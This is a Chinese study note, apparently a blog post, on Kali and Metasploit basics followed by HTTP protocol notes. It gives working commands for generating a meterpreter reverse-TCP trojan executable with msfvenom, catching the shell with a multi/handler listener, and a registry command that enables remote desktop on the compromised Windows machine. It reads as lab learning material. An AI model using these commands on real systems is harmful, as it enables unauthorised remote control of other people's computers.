zoukankan      html  css  js  c++  java
  • 2019-9-20:渗透测试,基础学习,笔记,metasploit的基础使用

    使用kali下metasploit生成木马,控制windows系统

    kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack)

    Metasploit,是综合利用工具,使用Ruby开发,使用方便

    msfconsole进入工具

    MSF,依赖postgresql数据库,在使用MSF前要开启数据库

    msfvenom:生成木马
    msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5555 -f exe > /root/desktop/muma.exe
    -p,后边跟着payload,攻击成功之后要做什么事情
    lhost,后跟监听的ip
    lport,后跟监听端口
    -f,表示要生产后门文件的类型
    >,重定向到一个路径

    将生成文件发送到靶子机

    开启msfconsole,开启前打开数据库postgresql

    exploits,开发利用,攻击某些服务,平台,系统等用到的工具,
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        show options,查看需要设置哪些参数
        set lhost 192.168.20.135
        run / exploit,启动监听

    在靶子机上点击exe程序,在kaLi中就可以得到靶子的shell
        shell,获取靶机的shell
        ipconfig
        rdesktop 靶机ip,可以登录远程桌面

        REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f,开启3389远程

    payloads,载荷载体,攻击成功之后要操作什么


    HTTP协议
    特点,简单快速,请求方式,get post head 等8种,无连接无状态
    支持模式,B/S:B指的浏览器,S指的servce, C/S:websocket

    URL,统一资源定位符,在网络中用来标识某处的资源
    https:(协议)//www.baidu.com(域名):8080(端口)/s(虚拟目录)/index.php(文件名)?wd=burphelper(参数)#name(锚点部分)

    request,请求包:请求行+请求头+空行+请求数据

    http 1.0 请求方式 get ,post ,head
    http 1.1 请求方式 get, post, head ,options, put ,delete ,trace ,connect

    BP拦截HTTP请求包

  • 相关阅读:
    BZOJ 1191 HNOI2006 超级英雄hero
    BZOJ 2442 Usaco2011 Open 修建草坪
    BZOJ 1812 IOI 2005 riv
    OJ 1159 holiday
    BZOJ 1491 NOI 2007 社交网络
    NOIP2014 D1 T3
    BZOJ 2423 HAOI 2010 最长公共子序列
    LCA模板
    NOIP 2015 D1T2信息传递
    数据结构
  • 原文地址:https://www.cnblogs.com/sym945/p/11559868.html
Copyright © 2011-2022 走看看